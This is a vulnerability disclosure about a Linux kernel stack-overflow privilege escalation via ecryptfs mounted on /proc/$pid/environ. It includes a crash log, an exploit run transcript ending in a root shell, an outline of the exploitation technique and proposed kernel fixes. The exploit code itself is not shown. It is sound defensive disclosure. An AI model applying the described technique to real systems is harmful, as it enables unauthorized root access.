Linux ecryptfs and /proc/$pid/environ Privilege Escalation

2016.06.22
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Stacking filesystems, including ecryptfs, protect themselves against deep nesting, which would lead to kernel stack overflow, by tracking the recursion depth of filesystems. E.g. in ecryptfs, this is implemented in ecryptfs_mount() as follows:

```
s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;

rc = -EINVAL;
if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
    pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
    goto out_free;
}
```

The files /proc/$pid/{mem,environ,cmdline}, when read, access the userspace memory of the target process, involving, if necessary, normal pagefault handling. If it was possible to mmap() them, an attacker could create a chain of e.g. /proc/$pid/environ mappings where process 1 has /proc/2/environ mapped into its environment area, process 2 has /proc/3/environ mapped into its environment area and so on. A read from /proc/1/environ would invoke the pagefault handler for process 1, which would invoke the pagefault handler for process 2 and so on. This would, again, lead to kernel stack overflow.

One interesting fact about ecryptfs is that, because of the encryption involved, it doesn't just forward mmap to the lower file's mmap operation. Instead, it has its own page cache, maintained using the normal filemap helpers, and performs its cryptographic operations when dirty pages need to be written out or when pages need to be faulted in. Therefore, not just its read and write handlers, but also its mmap handler only uses the lower filesystem's read and write methods. This means that using ecryptfs, you can mmap [decrypted views of] files that normally wouldn't be mappable.
Combining these things, it is possible to trigger recursion with arbitrary depth where:

- a reading userspace memory access in process A (from userland or from copy_from_user())
- causes a pagefault in an ecryptfs mapping in process A, which
- causes a read from /proc/{B}/environ, which
- causes a pagefault in an ecryptfs mapping in process B, which
- causes a read from /proc/{C}/environ, which
- causes a pagefault in an ecryptfs mapping in process C, and so on.

On systems with the /sbin/mount.ecryptfs_private helper installed (e.g. Ubuntu if the "encrypt my home directory" checkbox is ticked during installation), this bug can be triggered by an unprivileged user. The mount helper considers /proc/$pid, where $pid is the PID of a process owned by the user, to be a valid mount source because the directory is "owned" by the user.

I have attached both a generic crash PoC and a build-specific exploit that can be used to gain root privileges from a normal user account on Ubuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version 4.4.0-22.40, uname "Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux".
dmesg output of the crasher:

```
[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0
[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
[ 80.040028] PGD 1e0d067 PUD 0
[ 80.040028] Thread overran stack, or stack corrupted
[ 80.040028] Oops: 0000 [#1] SMP
[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video
[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu
[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000
[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046
[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068
[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200
[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000
[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200
[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68
[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000
[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0
[ 80.040028] Stack:
[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00
[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68
[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200
[ 80.040028] Call Trace:
[ 80.040028] <IRQ>
[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160
[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0
[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80
[ 80.040028] [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0
[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0
[ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60
[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60
[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60
[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70
[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290
[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0
[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60
[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50
[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90
[ 80.040028] <EOI>
[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d
[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
[ 80.040028] RSP <ffff88021fc03d70>
[ 80.040028] CR2: fffffffe4b9145c0
[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
[ 80.040028] ---[ end trace 616e3de50958c35b ]---
[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt
[ 80.040028] Shutting down cpus with NMI
[ 80.040028] Kernel Offset: disabled
[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt
```

Example run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:

```
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
compile.sh exploit.c hello.c suidhelper.c
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
compile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit
all spammers ready
recurser parent ready
spam over
fault chain set up, faulting now
writing stackframes
stackframes written
killing 2494
post-corruption code is alive!
children should be dead
coredump handler set. recurser exiting.
going to crash now
suid file detected, launching rootshell...
we have root privs now...
root@user-VirtualBox:/proc# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
```

(If the exploit crashes even with the right kernel version, try restarting the machine. Also, ensure that no program like top/htop/... is running that might try to read process command lines. Note that the PoC and the exploit don't really clean up after themselves and leave mountpoints behind that prevent them from re-running without a reboot or manual unmounting.)

Note that Ubuntu compiled their kernel with CONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used to be in the past to not crash the kernel while exploiting this bug, and an overwrite of addr_limit would be useless because at the time the thread_info is overwritten, there are multiple instances of kernel_read() on the stack. Still, the bug is exploitable by carefully aligning the stack so that the vital components of thread_info are preserved, stopping with an out-of-bounds stack pointer and overwriting the thread stack using a normal write to an adjacent allocation of the buddy allocator.

Regarding the fix, I think the following would be reasonable:

- Explicitly forbid stacking anything on top of procfs by setting its s_stack_depth to a sufficiently large value. In my opinion, there is too much magic going on inside procfs to allow stacking things on top of it, and there isn't any good reason to do it. (For example, ecryptfs invokes open handlers from a kernel thread instead of normal user process context, so the access checks inside VFS open handlers are probably ineffective - and procfs relies heavily on those.)
- Forbid opening files with f_op->mmap==NULL through ecryptfs. If the lower filesystem doesn't expect to be called in pagefault-handling context, it probably shouldn't be called in that context.
- Create a dedicated kernel stack cache outside of the direct mapping of physical memory that has a guard page (or a multi-page gap) at the bottom of each stack, and move the struct thread_info to a different place (if nothing else works, the top of the stack, above the pt_regs). While e.g. race conditions are more common than stack overflows in the Linux kernel, the whole vulnerability class of stack overflows is easy to mitigate, and the kernel is sufficiently complicated for unbounded recursion to emerge in unexpected places - or perhaps even for someone to discover a way to create a stack with a bounded length that is still too high. Therefore, I believe that guard pages are a useful mitigation. Nearly everywhere, stack overflows are caught using guard pages nowadays; this includes Linux userland, but also {### TODO ###} and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).

Oh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))` in schedule_debug() ought to be a direct panic instead of an oops. At the moment, when you hit it, you get a recursion between the scheduler invocation in do_exit() and the BUG_ON in the scheduler, and the kernel recurses down the stack until it hits something sufficiently important to cause a panic.

I'm going to send (compile-tested) patches for my first two fix suggestions and the recursive oops bug.
I haven't written a patch for the guard pages mitigation - I'm not familiar enough with the x86 subsystem for that.

Notes regarding the exploit:

- It makes an invalid assumption that causes it to require at least around 6GB of RAM.
- It has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.
- The page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=836

